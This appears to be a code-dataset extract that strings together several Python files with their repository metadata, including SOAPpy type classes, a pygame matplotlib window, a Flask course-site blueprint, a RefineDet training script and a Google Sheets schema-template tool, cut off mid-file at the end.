raise AttributeError("invalid %s type" % self._type)
return data
def _setAttr(self, attr, value):
attr = self._fixAttr(attr)
if attr[1] == 'encoding':
if attr[0] is not None or value not in ('base64', 'hex'):
raise AttributeError("invalid encoding")
self._cache = None
anyType._setAttr(self, attr, value)
class anyURIType(anyType):
_validURIs = (NS.XSD3,)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (StringType, UnicodeType):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
if self._cache is None:
self._cache = urllib.quote(self._data)
return self._cache
class uriType(anyURIType):
_validURIs = (NS.XSD,)
class uriReferenceType(anyURIType):
_validURIs = (NS.XSD2,)
class NOTATIONType(anyType):
def __init__(self, data, name=None, typed=1, attrs=None):
if self.__class__ == NOTATIONType:
raise Error("a NOTATION can't be instantiated directly")
anyType.__init__(self, data, name, typed, attrs)
class ENTITIESType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) in (StringType, UnicodeType):
return (data,)
if type(data) not in (ListType, TupleType) or \
filter(lambda x: type(x) not in (StringType, UnicodeType), data):
raise AttributeError("invalid %s type" % self._type)
return data
def _marshalData(self):
return ' '.join(self._data)
class IDREFSType(ENTITIESType):
pass
class NMTOKENSType(ENTITIESType):
pass
class integerType(anyType):
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType):
raise ValueError("invalid %s value" % self._type)
return data
class nonPositiveIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data > 0:
raise ValueError("invalid %s value" % self._type)
return data
class non_Positive_IntegerType(nonPositiveIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'non-positive-integer'
class negativeIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data >= 0:
raise ValueError("invalid %s value" % self._type)
return data
class negative_IntegerType(negativeIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'negative-integer'
class longType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -9223372036854775808L or \
data > 9223372036854775807L:
raise ValueError("invalid %s value" % self._type)
return data
class intType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -2147483648L or \
data > 2147483647L:
raise ValueError("invalid %s value" % self._type)
return data
class shortType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -32768 or \
data > 32767:
raise ValueError("invalid %s value" % self._type)
return data
class byteType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < -128 or \
data > 127:
raise ValueError("invalid %s value" % self._type)
return data
class nonNegativeIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data < 0:
raise ValueError("invalid %s value" % self._type)
return data
class non_Negative_IntegerType(nonNegativeIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'non-negative-integer'
class unsignedLongType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 18446744073709551615L:
raise ValueError("invalid %s value" % self._type)
return data
class unsignedIntType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 4294967295L:
raise ValueError("invalid %s value" % self._type)
return data
class unsignedShortType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 65535:
raise ValueError("invalid %s value" % self._type)
return data
class unsignedByteType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or \
data < 0 or \
data > 255:
raise ValueError("invalid %s value" % self._type)
return data
class positiveIntegerType(anyType):
_validURIs = (NS.XSD2, NS.XSD3, NS.ENC)
def _checkValueSpace(self, data):
if data is None:
raise ValueError("must supply initial %s value" % self._type)
if type(data) not in (IntType, LongType) or data <= 0:
raise ValueError("invalid %s value" % self._type)
return data
class positive_IntegerType(positiveIntegerType):
_validURIs = (NS.XSD,)
def _typeName(self):
return 'positive-integer'
# Now compound types
class compoundType(anyType):
def __init__(self, data=None, name=None, typed=1, attrs=None):
if self.__class__ == compoundType:
raise Error("a compound can't be instantiated directly")
anyType.__init__(self, data, name, typed, attrs)
self._keyord = []
if isinstance(data, DictType):
self.__dict__.update(data)
def _aslist(self, item=None):
if item is not None:
return self.__dict__[self._keyord[item]]
else:
return map(lambda x: self.__dict__[x], self._keyord)
def _asdict(self, item=None, encoding=Config.dict_encoding):
if item is not None:
if type(item) in (UnicodeType, StringType):
item = item.encode(encoding)
return self.__dict__[item]
else:
retval = {}
def fun(x): retval[x.encode(encoding)] = self.__dict__[x]
if hasattr(self, '_keyord'):
map(fun, self._keyord)
else:
for name in dir(self):
if isPublic(name):
retval[name] = getattr(self, name)
return retval
def __getitem__(self, item):
if isinstance(item, IntType):
return self.__dict__[self._keyord[item]]
else:
return getattr(self, item)
def __len__(self):
return len(self._keyord)
def __nonzero__(self):
return 1
def _keys(self):
return filter(lambda x: x[0] != '_', self.__dict__.keys())
def _addItem(self, name, value, attrs=None):
if name in self._keyord:
if not isinstance(self.__dict__[name], ListType):
self.__dict__[name] = [self.__dict__[name]]
self.__dict__[name].append(value)
else:
self.__dict__[name] = value
self._keyord.append(name)
def _placeItem(self, name, value, pos, subpos=0, attrs=None):
if subpos == 0 and not isinstance(self.__dict__[name], ListType):
self.__dict__[name] = value
else:
self.__dict__[name][subpos] = value
# only add to key order list if it does not already
# exist in list
if not (name in self._keyord):
if pos < len(self._keyord):
self._keyord[pos] = name
else:
self._keyord.append(name)
def _getItemAsList(self, name, default=[]):
try:
d = self.__dict__[name]
except Exception:
return default
if isinstance(d, ListType):
return d
return [d]
def __str__(self):
return anyType.__str__(self) + ": " + str(self._asdict())
def __repr__(self):
return self.__str__()
class structType(compoundType):
pass
class headerType(structType):
_validURIs = (NS.ENV,)
def __init__(self, data=None, typed=1, attrs=None):
structType.__init__(self, data, "Header", typed, attrs)
class bodyType(structType):
_validURIs = (NS.ENV,)
def __init__(self, data=None, typed=1, attrs=None):
structType.__init__(self, data, "Body", typed, attrs)
class arrayType(UserList.UserList, compoundType):
def __init__(self, data=None, name=None, attrs=None,
offset=0, rank=None, asize=0, elemsname=None):
if data:
if type(data) not in (ListType, TupleType):
raise Error("Data must be a sequence")
UserList.UserList.__init__(self, data)
compoundType.__init__(self, data, name, 0, attrs)
self._elemsname = elemsname or "item"
if data is None:
self._rank = rank
# According to 5.4.2.2 in the SOAP spec, each element in a
# sparse array must have a position. _posstate keeps track of
# whether we've seen a position or not. It's possible values
# are:
# -1 No elements have been added, so the state is indeterminate
# 0 An element without a position has been added, so no
# elements can have positions
# 1 An element with a position has been added, so all elements
# must have positions
self._posstate = -1
self._full = 0
if asize in ('', None):
asize = '0'
self._dims = map(lambda x: int(x), str(asize).split(','))
self._dims.reverse() # It's easier to work with this way
self._poss = [0] * len(self._dims) # This will end up
# reversed too
for i in range(len(self._dims)):
if self._dims[i] < 0 or \
self._dims[i] == 0 and len(self._dims) > 1:
raise TypeError("invalid Array dimensions")
if offset > 0:
self._poss[i] = offset % self._dims[i]
offset = int(offset / self._dims[i])
# Don't break out of the loop if offset is 0 so we test all the
# dimensions for > 0.
if offset:
raise AttributeError("invalid Array offset")
a = [None] * self._dims[0]
for i in range(1, len(self._dims)):
b = []
for j in range(self._dims[i]):
b.append(copy.deepcopy(a))
a = b
self.data = a
def _aslist(self, item=None):
if item is not None:
return self.data[int(item)]
else:
return self.data
def _asdict(self, item=None, encoding=Config.dict_encoding):
if item is not None:
if type(item) in (UnicodeType, StringType):
item = item.encode(encoding)
return self.data[int(item)]
else:
retval = {}
def fun(x): retval[str(x).encode(encoding)] = self.data[x]
map(fun, range(len(self.data)))
return retval
def __getitem__(self, item):
try:
return self.data[int(item)]
except ValueError:
return getattr(self, item)
def __len__(self):
return len(self.data)
def __nonzero__(self):
return 1
def __str__(self):
return anyType.__str__(self) + ": " + str(self._aslist())
def _keys(self):
return filter(lambda x: x[0] != '_', self.__dict__.keys())
def _addItem(self, name, value, attrs):
if self._full:
raise ValueError("Array is full")
pos = attrs.get((NS.ENC, 'position'))
if pos is not None:
if self._posstate == 0:
raise AttributeError(
"all elements in a sparse Array must have a "
"position attribute")
self._posstate = 1
try:
if pos[0] == '[' and pos[-1] == ']':
pos = map(lambda x: int(x), pos[1:-1].split(','))
pos.reverse()
if len(pos) == 1:
pos = pos[0]
curpos = [0] * len(self._dims)
for i in range(len(self._dims)):
curpos[i] = pos % self._dims[i]
pos = int(pos / self._dims[i])
if pos == 0:
break
if pos:
raise Exception
elif len(pos) != len(self._dims):
raise Exception
else:
for i in range(len(self._dims)):
if pos[i] >= self._dims[i]:
raise Exception
curpos = pos
else:
raise Exception
except Exception:
raise AttributeError(
"invalid Array element position %s" % str(pos))
else:
if self._posstate == 1:
raise AttributeError(
"only elements in a sparse Array may have a "
"position attribute")
self._posstate = 0
curpos = self._poss
a = self.data
for i in range(len(self._dims) - 1, 0, -1):
a = a[curpos[i]]
if curpos[0] >= len(a):
a += [None] * (len(a) - curpos[0] + 1)
a[curpos[0]] = value
if pos is None:
self._poss[0] += 1
for i in range(len(self._dims) - 1):
if self._poss[i] < self._dims[i]:
break
self._poss[i] = 0
self._poss[i + 1] += 1
if self._dims[-1] and self._poss[-1] >= self._dims[-1]:
# self._full = 1
# FIXME: why is this occuring?
pass
def _placeItem(self, name, value, pos, subpos, attrs=None):
curpos = [0] * len(self._dims)
for i in range(len(self._dims)):
if self._dims[i] == 0:
curpos[0] = pos
break
curpos[i] = pos % self._dims[i]
pos = int(pos / self._dims[i])
if pos == 0:
break
if self._dims[i] != 0 and pos:
raise Error("array index out of range")
a = self.data
for i in range(len(self._dims) - 1, 0, -1):
a = a[curpos[i]]
if curpos[0] >= len(a):
a += [None] * (len(a) - curpos[0] + 1)
a[curpos[0]] = value
class mapType(arrayType):
_validURIs = ('http://xml.apache.org/xml-soap',)
def __init__(self, data=None, name=None, attrs=None,
offset=0, rank=None, asize=0, elemsname=None):
arrayType.__init__(self, data, name, attrs, offset, rank, asize,
elemsname)
self._keyord = ['key', 'value']
class typedArrayType(arrayType):
def __init__(self, data=None, name=None, typed=None, attrs=None,
offset=0, rank=None, asize=0, elemsname=None, complexType=0):
arrayType.__init__(self, data, name, attrs, offset, rank, asize,
elemsname)
self._typed = 1
self._type = typed
self._complexType = complexType
class faultType(structType, Error):
def __init__(self, faultcode="", faultstring="", detail=None):
self.faultcode = faultcode
self.faultstring = faultstring
if detail is not None:
self.detail = detail
structType.__init__(self, None, 0)
def _setDetail(self, detail=None):
if detail is not None:
self.detail = detail
else:
try:
del self.detail
except AttributeError:
pass
def __repr__(self):
if getattr(self, 'detail', None) is not None:
return "<Fault %s: %s: %s>" % (self.faultcode,
self.faultstring,
self.detail)
else:
return "<Fault %s: %s>" % (self.faultcode, self.faultstring)
__str__ = __repr__
def __call__(self):
return (self.faultcode, self.faultstring, self.detail)
class SOAPException(Exception):
def __init__(self, code="", string="", detail=None):
self.value = ("SOAPpy SOAP Exception", code, string, detail)
self.code = code
self.string = string
self.detail = detail
def __str__(self):
return repr(self.value)
class RequiredHeaderMismatch(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MethodNotFound(Exception):
def __init__(self, value):
(val, detail) = value.split(":")
self.value = val
self.detail = detail
def __str__(self):
return repr(self.value, self.detail)
class AuthorizationFailed(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
class MethodFailed(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
#######
# Convert complex SOAPpy objects to native python equivalents
#######
def simplify(object, level=0):
"""
Convert the SOAPpy objects and their contents to simple python types.
This function recursively converts the passed 'container' object,
and all public subobjects. (Private subobjects have names that
start with '_'.)
Conversions:
- faultType --> raise python exception
- arrayType --> array
- compoundType --> dictionary
"""
if level > 10:
return object
if isinstance(object, faultType):
if object.faultstring == "Required Header Misunderstood":
raise RequiredHeaderMismatch(object.detail)
elif object.faultstring == "Method Not Found":
raise MethodNotFound(object.detail)
elif object.faultstring == "Authorization Failed":
raise AuthorizationFailed(object.detail)
elif object.faultstring == "Method Failed":
raise MethodFailed(object.detail)
else:
se = SOAPException(object.faultcode, object.faultstring,
object.detail)
raise se
elif isinstance(object, arrayType):
data = object._aslist()
for k in range(len(data)):
data[k] = simplify(data[k], level=level+1)
return data
elif isinstance(object, compoundType) or isinstance(object, structType):
data = object._asdict()
for k in data.keys():
if isPublic(k):
data[k] = simplify(data[k], level=level+1)
return data
elif type(object) == DictType:
for k in object.keys():
if isPublic(k):
object[k] = simplify(object[k])
return object
elif type(object) == list:
for k in range(len(object)):
object[k] = simplify(object[k])
return object
else:
return object
def simplify_contents(object, level=0):
"""
Convert the contents of SOAPpy objects to simple python types.
This function recursively converts the sub-objects contained in a
'container' object to simple python types.
Conversions:
- faultType --> raise python exception
- arrayType --> array
- compoundType --> dictionary
"""
if level > 10:
return object
if isinstance(object, faultType):
for k in object._keys():
if isPublic(k):
setattr(object, k, simplify(object[k], level=level+1))
raise object
elif isinstance(object, arrayType):
data = object._aslist()
for k in range(len(data)):
object[k] = simplify(data[k], level=level+1)
elif isinstance(object, structType):
data = object._asdict()
for k in data.keys():
if isPublic(k):
setattr(object, k, simplify(data[k], level=level+1))
elif isinstance(object, compoundType):
data = object._asdict()
for k in data.keys():
if isPublic(k):
object[k] = simplify(data[k], level=level+1)
elif isinstance(object, DictType):
for k in object.keys():
if isPublic(k):
object[k] = simplify(object[k])
elif type(object) == list:
for k in range(len(object)):
object[k] = simplify(object[k])
return object
| 28.400533
| 80
| 0.520009
| 46,931
| 0.881317
| 0
| 0
| 0
| 0
| 0
| 0
| 7,835
| 0.147133
|
af4465eb1740d25f4243ab38dfe29940e3f43d6f
| 1,508
|
py
|
Python
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 3
|
2021-12-13T17:56:15.000Z
|
2022-03-03T21:00:24.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | 1
|
2021-11-28T12:02:52.000Z
|
2021-12-21T09:04:41.000Z
|
pygame_matplotlib/gui_window.py
|
lionel42/pygame-matplotlib-backend
|
7b15c06189e0b690a0ec5ba83e6b9759f940642e
|
[
"MIT"
] | null | null | null |
"""Contain a window with a plot for pygame_gui."""
from typing import Union
import pygame
import pygame_gui
from pygame_gui.core.interfaces.manager_interface import IUIManagerInterface
from pygame_gui.core.ui_element import ObjectID
from .backend_pygame import FigureSurface
import matplotlib
matplotlib.use("module://pygame_matplotlib.backend_pygame")
class UIPlotWindow(pygame_gui.elements.ui_window.UIWindow):
def __init__(
self,
rect: pygame.Rect,
manager: IUIManagerInterface,
figuresurface: FigureSurface,
window_display_title: str = "",
element_id: Union[str, None] = None,
object_id: Union[ObjectID, str, None] = None,
resizable: bool = False,
visible: int = 1,
):
self.figuresurf = figuresurface
super().__init__(
rect,
manager,
window_display_title=window_display_title,
element_id=element_id,
object_id=object_id,
resizable=resizable,
visible=visible,
)
def set_dimensions(self, *args, **kwargs):
super().set_dimensions(*args, **kwargs)
print("setting dimensions")
# Update the size of the figure with the new bounding rectangle
self.figuresurf.set_bounding_rect(self.get_container().get_rect())
self.update_window_image()
def update_window_image(self):
# Update the image of the container
self.get_container().set_image(self.figuresurf)
| 31.416667
| 76
| 0.670424
| 1,149
| 0.761936
| 0
| 0
| 0
| 0
| 0
| 0
| 213
| 0.141247
|
af44d9ce71d347bfea046cddeb10613e1ff52421
| 67
|
py
|
Python
|
jetbrains-academy/Numeric Matrix Processor/Problems/Alphabet/task.py
|
robinpatra/ML-Study-3
|
6f401706a8da4cac5e63304ce09ff6ff62756d0b
|
[
"MIT"
] | null | null | null |
jetbrains-academy/Numeric Matrix Processor/Problems/Alphabet/task.py
|
robinpatra/ML-Study-3
|
6f401706a8da4cac5e63304ce09ff6ff62756d0b
|
[
"MIT"
] | null | null | null |
jetbrains-academy/Numeric Matrix Processor/Problems/Alphabet/task.py
|
robinpatra/ML-Study-3
|
6f401706a8da4cac5e63304ce09ff6ff62756d0b
|
[
"MIT"
] | null | null | null |
# work with this string
alphabet = input()
print(tuple(alphabet))
| 13.4
| 23
| 0.731343
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 23
| 0.343284
|
af454b0c2f018d2a6fb480e99014829738475907
| 955
|
py
|
Python
|
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
simpledu/handlers/front.py
|
xizhongzhao/simpledu
|
bf78435caa45d28118cdde3db73c078cf7ff55b1
|
[
"Apache-2.0"
] | null | null | null |
from flask import Blueprint,render_template,flash,url_for,redirect
from simpledu.models import Course
from simpledu.forms import LoginForm,RegisterForm
from flask_login import login_user
front = Blueprint('front',__name__)
@front.route('/')
def index():
courses = Course.query.all()
return render_template('index.html',courses=courses)
@front.route('/login')
def login():
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
login_user(user,form.remember_me.data)
return redirect(url_for('.index'))
return render_template('login.html',form=form)
@front.route('/register',methods=['GET','POST'])
def register():
form = RegisterForm()
if form.validate_on_submit():
form.create_user()
flash('register success!please login','success')
return redirect(url_for('.login'))
return render_template('register.html',form=form)
| 31.833333
| 66
| 0.710995
| 0
| 0
| 0
| 0
| 725
| 0.759162
| 0
| 0
| 135
| 0.141361
|
af456070653a62afea1b52eac295ba59531bc4a5
| 6,151
|
py
|
Python
|
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
main.py
|
sadegh1404/Refinedet_saffran
|
3c756fe16b75e83630553b64cb9cb53203b9cb81
|
[
"MIT"
] | null | null | null |
import argparse
import numpy as np
import os
from os import path
import tensorflow as tf
from tensorflow.keras.callbacks import ModelCheckpoint
from models import RefineDetVGG16
from utils import read_jpeg_image, resize_image_and_boxes, absolute2relative
from saffran.saffran_data_loader import load_saffran_dataset
from saffran.augmentations import Augmentation
from saffran.config import IMAGE_SIZE, BATCH_SIZE, SHUFFLE_BUFFER, NUM_CLASS, LR_SCHEDULE, MOMENTUM, NUM_EPOCHS, STEPS_PER_EPOCH
parser = argparse.ArgumentParser()
parser.add_argument('--saffran_root', type=str, default='./data/Saffron_Dataset/Labeled/',
help='Path to the VOCdevkit directory.')
parser.add_argument('--checkpoint', type=str, default=None,
help='Path to the weights file, in the case of resuming training.')
parser.add_argument('--initial_epoch', type=int, default=0,
help='Starting epoch. Give a value bigger than zero to resume training.')
parser.add_argument('--batch_size', type=int, default=None,
help='Useful for quick tests. If not provided, the value in the config file is used instead.')
args = parser.parse_args()
BATCH_SIZE = args.batch_size or BATCH_SIZE
def build_dataset(img_paths, bboxes, repeat=False, shuffle=False,
drop_remainder=False, augmentation_fn=None):
row_lengths = [len(img_bboxes) for img_bboxes in bboxes]
bboxes_concat = np.concatenate(bboxes, axis=0)
bboxes = tf.RaggedTensor.from_row_lengths(values=bboxes_concat,
row_lengths=row_lengths)
dataset = tf.data.Dataset.from_tensor_slices((img_paths, bboxes))
if repeat:
dataset = dataset.repeat()
if shuffle:
dataset = dataset.shuffle(len(img_paths),
reshuffle_each_iteration=True)
dataset = dataset.map(lambda img_path, boxes:
(read_jpeg_image(img_path), boxes))
if augmentation_fn:
dataset = dataset.map(augmentation_fn)
dataset = dataset.map(lambda image, boxes:
resize_image_and_boxes(image, boxes, IMAGE_SIZE))
dataset = dataset.map(lambda image, boxes:
(image, absolute2relative(boxes, tf.shape(image))))
# This hack is to allow batching into ragged tensors
dataset = dataset.map(lambda image, boxes:
(image, tf.expand_dims(boxes, 0)))
dataset = dataset.map(lambda image, boxes:
(image, tf.RaggedTensor.from_tensor(boxes)))
dataset = dataset.batch(BATCH_SIZE, drop_remainder=drop_remainder)
dataset = dataset.map(lambda image, boxes:
(image, boxes.merge_dims(1, 2)))
return dataset
train_img_paths, train_bboxes = load_saffran_dataset(dataroot=args.saffran_root)
print('INFO: Loaded %d training samples' % len(train_img_paths))
# Classes starts at 0
for i in train_bboxes:
i[:,-1] = i[:,-1] -1
train_data = build_dataset(train_img_paths, train_bboxes,
repeat=True, shuffle=True, drop_remainder=True,
augmentation_fn=Augmentation())
print(train_data)
print('INFO: Instantiating model...')
model = RefineDetVGG16(num_classes=NUM_CLASS,aspect_ratios=[1.0])
model.build(input_shape=(BATCH_SIZE, IMAGE_SIZE[0], IMAGE_SIZE[1], 3))
if args.checkpoint:
model.load_weights(args.checkpoint)
else:
model.base.load_weights(
path.join('weights', 'VGG_ILSVRC_16_layers_fc_reduced.h5'), by_name=True)
lr_scheduler = tf.keras.optimizers.schedules.PiecewiseConstantDecay(*LR_SCHEDULE)
optimizer = tf.keras.optimizers.SGD(lr_scheduler, momentum=MOMENTUM)
optimizer.iterations = tf.Variable(STEPS_PER_EPOCH * args.initial_epoch)
print('Trainint at learning rate =', optimizer._decayed_lr(tf.float32))
model.compile(optimizer=optimizer)
os.makedirs('weights', exist_ok=True)
callbacks = [
ModelCheckpoint(path.join('weights', 'refinedet_vgg16_{epoch:0d}.h5'),
monitor='total_loss')
]
history = model.fit(train_data, epochs=NUM_EPOCHS, steps_per_epoch=STEPS_PER_EPOCH,
initial_epoch=args.initial_epoch, callbacks=callbacks)
import cv2
import matplotlib.pyplot as plt
def sind(x):
return np.sin(x / 180*np.pi)
def cosd(x):
return np.cos(x / 180*np.pi)
def draw_line_segment(image, center, angle, color, length=40, thickness=3):
x1 = center[0] - cosd(angle) * length / 2
x2 = center[0] + cosd(angle) * length / 2
y1 = center[1] - sind(angle) * length / 2
y2 = center[1] + sind(angle) * length / 2
cv2.line(image, (int(x1 + .5), int(y1 + .5)), (int(x2 + .5), int(y2 + .5)), color, thickness)
def draw_ouput_lines(centers_box,test,print_conf=False,resize=False):
out = []
if resize:
test = cv2.resize(test,resize)
SIZE2,SIZE1 = resize
else:
SIZE1,SIZE2 = 640,640
if print_conf:
print(centers_box[:,-1])
for i in centers_box:
cx = i[0] * SIZE2
cy = i[1] * SIZE1
label = i[-2]
confidence = i[-1]
angle = np.arccos(label/NUM_CLASS)*(180/np.pi)
draw_line_segment(test,(cx,cy),angle,(255,255,0))
out.append('{} {} {} {}'.format(str(cx),str(cy),str(angle),str(confidence)))
plt.figure(figsize=(10,10))
plt.imshow(test)
plt.show()
return out
SIZE=640
test_dir = 'data/Saffron_Dataset/Test/' # CHANGE HERE TO CHANGE TEST DIRECTORY
test_images = os.listdir(test_dir)
for img_name in test_images:
if img_name.endswith('.txt'):
continue
img = cv2.imread(test_dir+img_name)
img = img.astype(np.float64)
org_shape = img.shape
img = cv2.resize(img,(SIZE,SIZE))
img = np.expand_dims(img,0)
out_boxes = model(img,decode=True)
nms_box = NMS(out_boxes[0],top_k=500,nms_threshold=0.1)
centers_box = minmax2xywh(nms_box)
out = draw_ouput_lines(centers_box,img[0].astype(np.uint8),False,resize=org_shape[:2][::-1])
out = '\n'.join(out)
with open(test_dir + img_name.split('.')[0]+'.txt','w') as f:
f.write(out)
| 35.761628
| 128
| 0.667859
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 718
| 0.116729
|
af4aa6d6dc3668051cf943238abd945caf290ab8
| 610
|
py
|
Python
|
Code/utils/Load_model.py
|
rezacsedu/Detection-of-Hate-Speech-in-Multimodal-Memes
|
9c66be09d4d12c0f9630e4fe4060dd1aa7c5fd0b
|
[
"CC0-1.0"
] | 8
|
2021-03-14T00:37:44.000Z
|
2022-03-06T07:41:27.000Z
|
Code/utils/Load_model.py
|
rezacsedu/Detection-of-Hate-Speech-in-Multimodal-Memes
|
9c66be09d4d12c0f9630e4fe4060dd1aa7c5fd0b
|
[
"CC0-1.0"
] | 1
|
2021-03-30T14:29:22.000Z
|
2022-01-31T18:21:25.000Z
|
Code/utils/Load_model.py
|
rezacsedu/Detection-of-Hate-Speech-in-Multimodal-Memes
|
9c66be09d4d12c0f9630e4fe4060dd1aa7c5fd0b
|
[
"CC0-1.0"
] | 2
|
2021-03-01T02:51:53.000Z
|
2021-08-10T09:18:26.000Z
|
import torch
######### Load saved model from checkpoint #########
def load(modelpath, model, optimizer, lr_scheduler):
checkpoint = torch.load(modelpath)
model.load_state_dict(checkpoint['model_state_dict'])
optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
train_loss = checkpoint['Training_Loss_List']
v_loss = checkpoint['Validation_Loss_List']
v_acc = checkpoint['Validation_Accuracy_List']
epoch = checkpoint['Epoch']
lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])
return model, optimizer, lr_scheduler, train_loss, v_loss, v_acc, epoch
| 35.882353
| 75
| 0.736066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.298361
|
af4ba5a904905887481da5fbd8875608d26d4c5d
| 7,649
|
py
|
Python
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | null | null | null |
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 3
|
2021-02-09T14:57:00.000Z
|
2021-09-27T23:23:45.000Z
|
scripts/make_template.py
|
ebi-ait/lattice-tools
|
7d72b04fae879f4330702df93bbfc0ea8a6bbdaa
|
[
"MIT"
] | 1
|
2022-02-23T14:21:17.000Z
|
2022-02-23T14:21:17.000Z
|
import argparse
import gspread
import json
import lattice
import requests
import string
import sys
from collections import OrderedDict
from gspread_formatting import *
from oauth2client.service_account import ServiceAccountCredentials
from urllib.parse import urljoin
def getArgs():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
)
parser.add_argument('-t','--type',
help="the object type to return a template for")
parser.add_argument('-m','--mode',
help="the server to look-up schema, if not local")
parser.add_argument('-c','--creds',
help="the location of google drive client_secret.json file")
parser.add_argument('-s','--sheet',
help="the key for the google sheet")
args = parser.parse_args()
return args
args = getArgs()
if not args.type:
sys.exit('ERROR: --type is required')
if not args.creds:
sys.exit('ERROR: --creds is required')
if not args.sheet:
sys.exit('ERROR: --sheet is required')
if not args.mode:
sys.exit('ERROR: --mode is required')
schema_name = args.type
# follow instructions here to enable API & generate credentials
# https://www.twilio.com/blog/2017/02/an-easy-way-to-read-and-write-to-a-google-spreadsheet-in-python.html
creds = ServiceAccountCredentials.from_json_keyfile_name(args.creds, 'https://www.googleapis.com/auth/drive')
client = gspread.authorize(creds)
sheet = client.open_by_key(args.sheet)
for tab in sheet.worksheets():
if tab.title == schema_name:
sheet.del_worksheet(tab)
tab = sheet.add_worksheet(title=schema_name,rows='100',cols='52')
abcs = string.ascii_uppercase
cell_grid = list(abcs) + ['A' + i for i in abcs]
connection = lattice.Connection(args.mode)
server = connection.server
# grab the OntologyTerm term_name & term_id schemas to put in places that linkTo OntologyTerm
ont_schema_url = urljoin(server, 'profiles/ontology_term/?format=json')
ont_schema = requests.get(ont_schema_url).json()
term_id_props = ont_schema['properties']['term_id']
term_name_props = ont_schema['properties']['term_name']
# grab all of the submittable properties
props = {}
schema_url = urljoin(server, 'profiles/' + schema_name + '/?format=json')
schema = requests.get(schema_url).json()
for p in schema['properties'].keys():
props[p] = schema['properties'][p]
ordered_props = OrderedDict(props)
# grab all of the properties of subobjects
subprops = {}
non_submit = [] # collect the base property so we can grey it out in favor of the subproperties
for p in props.keys():
if props[p]['type'] == 'object' or \
(props[p]['type'] == 'array' and props[p]['items']['type'] == 'object'):
subprops[p] = props[p]
ordered_props.pop(p)
non_submit.append(p)
if props[p]['type'] == 'array':
for sp in props[p]['items']['properties'].keys():
if props[p]['items']['properties'][sp]['type'] == 'object' or \
